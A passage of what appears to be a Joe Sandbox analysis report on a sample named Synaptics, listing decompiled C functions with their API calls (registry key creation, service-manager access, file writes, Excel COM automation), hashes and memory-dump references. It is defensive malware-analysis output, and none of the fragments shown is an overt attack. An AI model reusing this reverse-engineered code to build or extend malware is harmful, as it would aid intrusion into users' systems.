                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateErrorFileHandleLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1572049330-0
                                                                                                                                                                                                                            • Opcode ID: c8eac1bd2ae1f70e96429ff86d89176e80f32e19ecca17d28057418124fa5a47
                                                                                                                                                                                                                            • Instruction ID: 1e67efa80632d682362f14ea232ee9a6b3403708de1835596950b0ec37a53b76
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8eac1bd2ae1f70e96429ff86d89176e80f32e19ecca17d28057418124fa5a47
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3911EB61504100BAEB149F19CD887566D5D9F81319F28C2BBD419BF3F9D67CCE4093AD
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E0045A4E8(void* __eax, char* __ecx, struct tagMSG* __edx) {
                                                                                                                                                                                                                            				int _t7;
                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                            				MSG* _t30;
                                                                                                                                                                                                                            				void* _t31;
                                                                                                                                                                                                                            				char* _t32;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t22 = __ecx;
                                                                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                                                                            				_t30 = __edx;
                                                                                                                                                                                                                            				_t31 = __eax;
                                                                                                                                                                                                                            				_t21 = 0;
                                                                                                                                                                                                                            				_t7 = PeekMessageA(__edx, 0, 0, 0, 1); // executed
                                                                                                                                                                                                                            				if(_t7 != 0) {
                                                                                                                                                                                                                            					_t21 = 1;
                                                                                                                                                                                                                            					if(_t30->message == 0x12) {
                                                                                                                                                                                                                            						 *((char*)(_t31 + 0x9c)) = 1;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *_t32 = 0;
                                                                                                                                                                                                                            						if( *((short*)(_t31 + 0xda)) != 0) {
                                                                                                                                                                                                                            							_t22 = _t32;
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t31 + 0xd8))();
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            						if(E0045A448(_t31, _t30) == 0 &&  *_t32 == 0 && E0045A340(_t31, _t30) == 0 && E0045A390(_t31, _t22, _t30) == 0 && E0045A31C(_t31, _t30) == 0) {
                                                                                                                                                                                                                            							TranslateMessage(_t30);
                                                                                                                                                                                                                            							DispatchMessageA(_t30); // executed
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t21;
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0045A4FB
                                                                                                                                                                                                                            • TranslateMessage.USER32 ref: 0045A565
                                                                                                                                                                                                                            • DispatchMessageA.USER32 ref: 0045A56B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$DispatchPeekTranslate
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4217535847-0
                                                                                                                                                                                                                            • Opcode ID: d5e9e376560588d28cd7a4776222bd9ede00ef77f9ba1b200076287ecf781b44
                                                                                                                                                                                                                            • Instruction ID: 2ed0c1a20c59febfa1985896f2b2d1bc9742e22b53ed284e6756f8042308f4ec
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5e9e376560588d28cd7a4776222bd9ede00ef77f9ba1b200076287ecf781b44
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E01FE20B04304A6EA31266B6805F6B97854FD27CAF14425FFD45B7393D6AC9C5E423F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                            			E00446564(void* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                            				intOrPtr _t6;
                                                                                                                                                                                                                            				intOrPtr _t8;
                                                                                                                                                                                                                            				intOrPtr _t10;
                                                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                                                            				intOrPtr _t14;
                                                                                                                                                                                                                            				void* _t16;
                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                            				intOrPtr _t20;
                                                                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                                                                            				intOrPtr _t22;
                                                                                                                                                                                                                            				intOrPtr _t23;
                                                                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t25 = __esi;
                                                                                                                                                                                                                            				_t17 = __ecx;
                                                                                                                                                                                                                            				_push(_t28);
                                                                                                                                                                                                                            				_push(0x4465ea);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t28;
                                                                                                                                                                                                                            				 *0x49eb20 =  *0x49eb20 - 1;
                                                                                                                                                                                                                            				if( *0x49eb20 < 0) {
                                                                                                                                                                                                                            					 *0x49eb1c = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
                                                                                                                                                                                                                            					_t31 =  *0x49eb1c;
                                                                                                                                                                                                                            					E00446330(_t16, __edi,  *0x49eb1c);
                                                                                                                                                                                                                            					_t6 =  *0x436dd0; // 0x436e1c
                                                                                                                                                                                                                            					E0041A4A8(_t6, _t16, _t17,  *0x49eb1c);
                                                                                                                                                                                                                            					_t8 =  *0x436dd0; // 0x436e1c
                                                                                                                                                                                                                            					E0041A548(_t8, _t16, _t17, _t31);
                                                                                                                                                                                                                            					_t21 =  *0x436dd0; // 0x436e1c
                                                                                                                                                                                                                            					_t10 =  *0x447948; // 0x447994
                                                                                                                                                                                                                            					E0041A4F4(_t10, _t16, _t21, __esi, _t31);
                                                                                                                                                                                                                            					_t22 =  *0x436dd0; // 0x436e1c
                                                                                                                                                                                                                            					_t12 =  *0x4465f4; // 0x446640
                                                                                                                                                                                                                            					E0041A4F4(_t12, _t16, _t22, __esi, _t31);
                                                                                                                                                                                                                            					_t23 =  *0x436dd0; // 0x436e1c
                                                                                                                                                                                                                            					_t14 =  *0x44675c; // 0x4467a8
                                                                                                                                                                                                                            					E0041A4F4(_t14, _t16, _t23, _t25, _t31);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t20);
                                                                                                                                                                                                                            				 *[fs:eax] = _t20;
                                                                                                                                                                                                                            				_push(0x4465f1);
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetVersion.KERNEL32(00000000,004465EA), ref: 0044657E
                                                                                                                                                                                                                              • Part of subcall function 00446330: GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                                                                                                                                                                                              • Part of subcall function 00446330: GlobalAddAtomA.KERNEL32 ref: 00446384
                                                                                                                                                                                                                              • Part of subcall function 00446330: GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                                                                                                                                                                                              • Part of subcall function 00446330: GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                                                                                                                                                                                              • Part of subcall function 00446330: RegisterClipboardFormatA.USER32 ref: 004463EB
                                                                                                                                                                                                                              • Part of subcall function 00446330: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                                                                                                                                                                                              • Part of subcall function 00446330: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                                                                                                                                                                                                            • String ID: @fD
                                                                                                                                                                                                                            • API String ID: 3775504709-3452771706
                                                                                                                                                                                                                            • Opcode ID: 95a3d3956bea3f460346f6cd369638779209bac5c04267071be8a34415b91482
                                                                                                                                                                                                                            • Instruction ID: a2d0d9fa5674fa572cfd9e012cd62e1639ea6f2d0861d92eee2e079839ffb759
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95a3d3956bea3f460346f6cd369638779209bac5c04267071be8a34415b91482
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBF04F78214241AFE305FF2AFC5291937A4FB86314792947AF400436A6CA3CA851CB0E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                                                                                            			E0045EFA8(void* __ecx, void* __edx) {
                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                            				intOrPtr _t16;
                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                            				void* _t18;
                                                                                                                                                                                                                            				void* _t19;
                                                                                                                                                                                                                            				void* _t22;
                                                                                                                                                                                                                            				void* _t23;
                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t19 = __edx;
                                                                                                                                                                                                                            				_t18 = __ecx;
                                                                                                                                                                                                                            				if(__edx != 0) {
                                                                                                                                                                                                                            					_t24 = _t24 + 0xfffffff0;
                                                                                                                                                                                                                            					_t7 = E00403F10(_t7, _t23);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t17 = _t19;
                                                                                                                                                                                                                            				_t22 = _t7;
                                                                                                                                                                                                                            				E00421B3C(_t18, 0);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t22 + 0xea)) = E00403BBC(1);
                                                                                                                                                                                                                            				if(( *(_t22 + 0x1c) & 0x00000010) == 0) {
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t22 + 0xd2)) = RegisterClipboardFormatA("MsgId_OrtusShellChangeNotifier");
                                                                                                                                                                                                                            					_t16 = E00451878(E0045E9EC, _t22); // executed
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t22 + 0xda)) = _t16;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t12 = _t22;
                                                                                                                                                                                                                            				if(_t17 != 0) {
                                                                                                                                                                                                                            					E00403F68(_t12);
                                                                                                                                                                                                                            					_pop( *[fs:0x0]);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _t22;
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegisterClipboardFormatA.USER32 ref: 0045EFE0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • MsgId_OrtusShellChangeNotifier, xrefs: 0045EFDB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ClipboardFormatRegister
                                                                                                                                                                                                                            • String ID: MsgId_OrtusShellChangeNotifier
                                                                                                                                                                                                                            • API String ID: 1228543026-1463447210
                                                                                                                                                                                                                            • Opcode ID: f8979d51b969080b0751403073583cda04ec3b2a51cbefc876ef6116b0c698af
                                                                                                                                                                                                                            • Instruction ID: 9954d9dd0750aaeb66af585a099ed7c5191191f0ac21a3cbd5b83f5e84ca41d7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8979d51b969080b0751403073583cda04ec3b2a51cbefc876ef6116b0c698af
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31F0BB62B0061156C220EB7B5C027477EA48F0175AF04443FFC94973D3DA395D0C439E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 41%
                                                                                                                                                                                                                            			E004781D4(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                                                                            				intOrPtr _t26;
                                                                                                                                                                                                                            				void* _t27;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t27 = __eflags;
                                                                                                                                                                                                                            				_push(0);
                                                                                                                                                                                                                            				_push(_t26);
                                                                                                                                                                                                                            				_push(0x478221);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t26;
                                                                                                                                                                                                                            				_t20 = __eax;
                                                                                                                                                                                                                            				E004051EC( &_v8, __eax);
                                                                                                                                                                                                                            				_push(E004051FC(_v8)); // executed
                                                                                                                                                                                                                            				L00417E0C(); // executed
                                                                                                                                                                                                                            				E004781BC(_t9, _t20, _t27);
                                                                                                                                                                                                                            				_pop(_t21);
                                                                                                                                                                                                                            				 *[fs:eax] = _t21;
                                                                                                                                                                                                                            				_push(E00478228);
                                                                                                                                                                                                                            				return E004050A0( &_v8);
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 741EBC30.OLE32(00000000,?,00000000,00478221,?,?,Excel.Application,00000000,?,00478242), ref: 00478201
                                                                                                                                                                                                                              • Part of subcall function 004050A0: SysFreeString.OLEAUT32(088B90C3), ref: 004050AE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeString
                                                                                                                                                                                                                            • String ID: Excel.Application
                                                                                                                                                                                                                            • API String ID: 3341692771-3141931764
                                                                                                                                                                                                                            • Opcode ID: d4df13c63ea33310663f577415f2673a26f61d1dea7470d4c1a0fdc135645ee0
                                                                                                                                                                                                                            • Instruction ID: 5a7791121ba19d98e3bcb4b8c02d80bfc0818dc7363a01a43232f673b92e6833
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4df13c63ea33310663f577415f2673a26f61d1dea7470d4c1a0fdc135645ee0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4E0E530704B087BD701EB62DC52E8E77ECDB4A714BA248BAF400E2642DE3C9E0094A8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 66%
                                                                                                                                                                                                                            			E00431EF8(void* __eax, void* __ebx, char __ecx, void* __edx, void* __esi) {
                                                                                                                                                                                                                            				char _v5;
                                                                                                                                                                                                                            				char _v6;
                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                            				char _v16;
                                                                                                                                                                                                                            				int _v20;
                                                                                                                                                                                                                            				char* _t40;
                                                                                                                                                                                                                            				signed int _t43;
                                                                                                                                                                                                                            				char* _t55;
                                                                                                                                                                                                                            				signed char _t63;
                                                                                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                                                                                            				void* _t78;
                                                                                                                                                                                                                            				void* _t81;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_v16 = 0;
                                                                                                                                                                                                                            				_v5 = __ecx;
                                                                                                                                                                                                                            				_t78 = __eax;
                                                                                                                                                                                                                            				_push(_t81);
                                                                                                                                                                                                                            				_push(0x431ffd);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t81 + 0xfffffff0;
                                                                                                                                                                                                                            				E00404A58( &_v16, __edx);
                                                                                                                                                                                                                            				_t63 = E00431D88(_v16);
                                                                                                                                                                                                                            				if(_t63 == 0) {
                                                                                                                                                                                                                            					E00404F20( &_v16, 1, 1);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_v12 = 0;
                                                                                                                                                                                                                            				if(_v5 == 0 || _v16 == 0) {
                                                                                                                                                                                                                            					_t40 = E00404E80(_v16);
                                                                                                                                                                                                                            					_t43 = RegOpenKeyExA(E00431EE4(_t78, _t63), _t40, 0,  *(_t78 + 0x18),  &_v12); // executed
                                                                                                                                                                                                                            					_v6 = _t43 == 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					_t55 = E00404E80(_v16);
                                                                                                                                                                                                                            					_t43 = RegCreateKeyExA(E00431EE4(_t78, _t63), _t55, 0, 0, 0,  *(_t78 + 0x18), 0,  &_v12,  &_v20);
                                                                                                                                                                                                                            					_v6 = _t43 == 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				if(_v6 != 0) {
                                                                                                                                                                                                                            					if(((_t43 & 0xffffff00 |  *((intOrPtr*)(_t78 + 4)) != 0x00000000) & _t63) != 0) {
                                                                                                                                                                                                                            						_push( *((intOrPtr*)(_t78 + 0x10)));
                                                                                                                                                                                                                            						_push(E00432018);
                                                                                                                                                                                                                            						_push(_v16);
                                                                                                                                                                                                                            						E00404D40();
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					E00431EC0(_t78, _v16, _v12);
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t72);
                                                                                                                                                                                                                            				 *[fs:eax] = _t72;
                                                                                                                                                                                                                            				_push(E00432004);
                                                                                                                                                                                                                            				return E004049C0( &_v16);
                                                                                                                                                                                                                            			}
















                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,?,?,00000000,00431FFD,?,?,00000001), ref: 00431F72
                                                                                                                                                                                                                            • RegCreateKeyExA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,?,00000000,00000000,00431FFD,?,?,00000001), ref: 00431FA6
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateOpen
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 436179556-0
                                                                                                                                                                                                                            • Opcode ID: e1a5a51a70a2a78c8410cf28fc2fe6ab7f94f755bea54f4d5c90a32333cb09bd
                                                                                                                                                                                                                            • Instruction ID: b4c976e95b02fa110a8c934fabbdb83e4f1344f95f7529043488b7411d694942
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e1a5a51a70a2a78c8410cf28fc2fe6ab7f94f755bea54f4d5c90a32333cb09bd
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E6317371A042087FDB11EBA5D842BDFB7B9EF48304F10857AF914E3291DB799E098758
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00402FE0(void** __eax, void* __edx, intOrPtr _a4, void* _a8, signed int _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                            				void** _t48;
                                                                                                                                                                                                                            				signed int _t49;
                                                                                                                                                                                                                            				signed int _t58;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t58 = _t49;
                                                                                                                                                                                                                            				_t48 = __eax;
                                                                                                                                                                                                                            				if(_a12 != (__eax[1] & 0x0000ffff & _a12)) {
                                                                                                                                                                                                                            					E004028E4(0x67);
                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					if(WriteFile( *__eax, __edx, __eax[2] * _t58,  &_v8, 0) != 0) {
                                                                                                                                                                                                                            						_v8 = _v8 /  *(_t48 + 8);
                                                                                                                                                                                                                            						if(_a16 == 0) {
                                                                                                                                                                                                                            							if(_t58 != _v8) {
                                                                                                                                                                                                                            								E004028E4(_a4);
                                                                                                                                                                                                                            								_v8 = 0;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							 *_a16 = _v8;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						E004028E4(GetLastError());
                                                                                                                                                                                                                            						_v8 = 0;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,00403085,00000065,00402FD8,0000D7B2,?,?), ref: 0040300A
                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00403085,00000065,00402FD8,0000D7B2,?,?,?,00474E3F,00000000,00000000,00474E74), ref: 00403011
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 442123175-0
                                                                                                                                                                                                                            • Opcode ID: 0d69c125084957f3b94c88cdf34e0184f0e2678b999d60466521ef1ad3156c2d
                                                                                                                                                                                                                            • Instruction ID: dacf0affb31a298fea10ec7efa56baaddcddd91d2a84db1d45905dc1d19b3bb0
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0d69c125084957f3b94c88cdf34e0184f0e2678b999d60466521ef1ad3156c2d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6D113071A01108EFDB44DF69C940A9ABBECEF48311B108477A808F7285E674DE009765
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 53%
                                                                                                                                                                                                                            			E004738BC(char __eax, signed int __ebx) {
                                                                                                                                                                                                                            				char _v8;
                                                                                                                                                                                                                            				intOrPtr* _t11;
                                                                                                                                                                                                                            				void* _t14;
                                                                                                                                                                                                                            				intOrPtr _t25;
                                                                                                                                                                                                                            				intOrPtr _t28;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                            				_v8 = __eax;
                                                                                                                                                                                                                            				E00404E70(_v8);
                                                                                                                                                                                                                            				_push(_t28);
                                                                                                                                                                                                                            				_push(0x473922);
                                                                                                                                                                                                                            				_push( *[fs:eax]);
                                                                                                                                                                                                                            				 *[fs:eax] = _t28;
                                                                                                                                                                                                                            				_t11 =  *0x49de34; // 0x49b0ec
                                                                                                                                                                                                                            				if( *_t11 == 2) {
                                                                                                                                                                                                                            					_t14 = OpenSCManagerA(E00404E80(_v8), 0, 0xf003f); // executed
                                                                                                                                                                                                                            					if((__ebx & 0xffffff00 | _t14 != 0x00000000) != 0) {
                                                                                                                                                                                                                            						CloseServiceHandle(_t14);
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_pop(_t25);
                                                                                                                                                                                                                            				 *[fs:eax] = _t25;
                                                                                                                                                                                                                            				_push(E00473929);
                                                                                                                                                                                                                            				return E004049C0( &_v8);
                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,00000000,00473922,?,021E2354,?,?,0049A443), ref: 004738F8
                                                                                                                                                                                                                            • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,000F003F,00000000,00473922,?,021E2354,?,?,0049A443), ref: 00473907
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseHandleManagerOpenService
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1199824460-0
                                                                                                                                                                                                                            • Opcode ID: 3971470c61dd45be730c7742b8a9d7523f2163cc16d5b139840d9d0ca77dbf79
                                                                                                                                                                                                                            • Instruction ID: 9747779068363641c57f556ad18b80e8a6fd65f6f560b6840aedc400607e3997
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3971470c61dd45be730c7742b8a9d7523f2163cc16d5b139840d9d0ca77dbf79
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A7F0F0F0640308AFD701EB65DD03AAB7BECEB46701BA14477FA04A7292DA789E04E518
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                            			E00458384(void* __eax) {
                                                                                                                                                                                                                            				struct HICON__* _t5;
                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t11;
                                                                                                                                                                                                                            				CHAR** _t12;
                                                                                                                                                                                                                            				void* _t13;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t13 = __eax;
